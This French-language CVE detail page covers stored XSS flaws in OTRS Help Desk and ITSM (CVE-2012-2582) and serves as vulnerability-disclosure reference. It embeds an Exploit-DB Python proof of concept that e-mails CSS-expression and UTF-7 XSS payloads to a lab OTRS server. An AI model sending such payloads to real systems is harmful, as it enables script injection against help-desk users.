CVE-2012-2582 : Détail

CVE-2012-2582

Cross-site Scripting
A03-Injection
0.61%V3
Network
2012-08-23
08h00 +00:00
2012-11-06
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Multiple cross-site scripting (XSS) vulnerabilities in Open Ticket Request System (OTRS) Help Desk 2.4.x before 2.4.13, 3.0.x before 3.0.15, and 3.1.x before 3.1.9, and OTRS ITSM 2.1.x before 2.1.5, 3.0.x before 3.0.6, and 3.1.x before 3.1.6, allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a Cascading Style Sheets (CSS) expression property in the STYLE attribute of an arbitrary element or (2) UTF-7 text in an HTTP-EQUIV="CONTENT-TYPE" META element.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20359

Date de publication : 2012-08-07 22h00 +00:00
Auteur : loneferret
EDB Vérifié : Yes

#!/usr/bin/python ''' Author: loneferret of Offensive Security Product: OTRS Open Technology Real Services Version: 3.1.4 (Windows) Vendor Site: http://www.otrs.com/en/ Timeline: 29 May 2012: Vulnerability reported to CERT 30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012 23 Jul 2012: Update from CERT: No response other than auto-reply from vendor 08 Aug 2012: Public Disclosure 22 Aug 2012: Update from CERT: vulnerability patched http://www.kb.cert.org/vuls/id/582879 http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2012-01/ Installed On: Windows Server 2003 SP2 Client Test OS: Window 7 Pro SP1 (x86) Browser Used: Internet Explorer 9 Injection Point: Body Injection Payload(s): 1: <DIV STYLE="width: expression(alert('XSS'));"> 2: exp/*<XSS STYLE='no\xss:noxss("*//*"); xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> 3: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> 4: <XSS STYLE="xss:expression(alert('XSS'))"> 5: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- ''' import smtplib, urllib2 payload = """<DIV STYLE="width: expression(alert('XSS'));">""" def sendMail(dstemail, frmemail, smtpsrv, username, password): msg = "From: hacker@offsec.local\n" msg += "To: victim@victim.local\n" msg += 'Date: Today\r\n' msg += "Subject: Offensive Security\n" msg += "Content-type: text/html\n\n" msg += "XSS" + payload + "\r\n\r\n" server = smtplib.SMTP(smtpsrv) server.login(username,password) try: server.sendmail(frmemail, dstemail, msg) except Exception, e: print "[-] Failed to send email:" print "[*] " + str(e) server.quit() username = "hacker@offsec.local" password = "123456" dstemail = "victim@victim.local" frmemail = "hacker@offsec.local" smtpsrv = "172.16.84.171" print "[*] Sending Email" sendMail(dstemail, frmemail, smtpsrv, username, password)

Products Mentioned

Configuraton 0

Otrs>>Otrs >> Version 2.4.0

Otrs>>Otrs >> Version 2.4.0

Otrs>>Otrs >> Version 2.4.0

Otrs>>Otrs >> Version 2.4.0

Otrs>>Otrs >> Version 2.4.0

Otrs>>Otrs >> Version 2.4.0

Otrs>>Otrs >> Version 2.4.1

Otrs>>Otrs >> Version 2.4.2

Otrs>>Otrs >> Version 2.4.3

Otrs>>Otrs >> Version 2.4.4

Otrs>>Otrs >> Version 2.4.5

Otrs>>Otrs >> Version 2.4.6

Otrs>>Otrs >> Version 2.4.7

Otrs>>Otrs >> Version 2.4.8

Otrs>>Otrs >> Version 2.4.9

Otrs>>Otrs >> Version 2.4.10

Otrs>>Otrs >> Version 2.4.11

Otrs>>Otrs >> Version 2.4.12

Configuraton 0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.0

Otrs>>Otrs >> Version 3.0.1

Otrs>>Otrs >> Version 3.0.2

Otrs>>Otrs >> Version 3.0.3

Otrs>>Otrs >> Version 3.0.4

Otrs>>Otrs >> Version 3.0.5

Otrs>>Otrs >> Version 3.0.6

Otrs>>Otrs >> Version 3.0.7

Otrs>>Otrs >> Version 3.0.8

Otrs>>Otrs >> Version 3.0.9

Otrs>>Otrs >> Version 3.0.10

Otrs>>Otrs >> Version 3.0.11

Otrs>>Otrs >> Version 3.0.12

Otrs>>Otrs >> Version 3.0.13

Otrs>>Otrs >> Version 3.0.14

Configuraton 0

Otrs>>Otrs >> Version 3.1.0

Otrs>>Otrs >> Version 3.1.1

Otrs>>Otrs >> Version 3.1.2

Otrs>>Otrs >> Version 3.1.3

Otrs>>Otrs >> Version 3.1.4

Otrs>>Otrs >> Version 3.1.5

Otrs>>Otrs >> Version 3.1.6

Otrs>>Otrs >> Version 3.1.7

Otrs>>Otrs >> Version 3.1.8

Configuraton 0

Otrs>>Otrs_itsm >> Version 2.1.0

Otrs>>Otrs_itsm >> Version 2.1.1

Otrs>>Otrs_itsm >> Version 2.1.2

Otrs>>Otrs_itsm >> Version 2.1.3

Otrs>>Otrs_itsm >> Version 2.1.4

Otrs>>Otrs_itsm >> Version 3.0.0

Otrs>>Otrs_itsm >> Version 3.0.1

Otrs>>Otrs_itsm >> Version 3.0.2

Otrs>>Otrs_itsm >> Version 3.0.3

Otrs>>Otrs_itsm >> Version 3.0.4

Otrs>>Otrs_itsm >> Version 3.0.5

Otrs>>Otrs_itsm >> Version 3.1.0

Otrs>>Otrs_itsm >> Version 3.1.1

Otrs>>Otrs_itsm >> Version 3.1.2

Otrs>>Otrs_itsm >> Version 3.1.3

Otrs>>Otrs_itsm >> Version 3.1.4

Otrs>>Otrs_itsm >> Version 3.1.5

Références

http://www.kb.cert.org/vuls/id/582879
Tags : third-party-advisory, x_refsource_CERT-VN
http://secunia.com/advisories/50513
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2012/dsa-2536
Tags : vendor-advisory, x_refsource_DEBIAN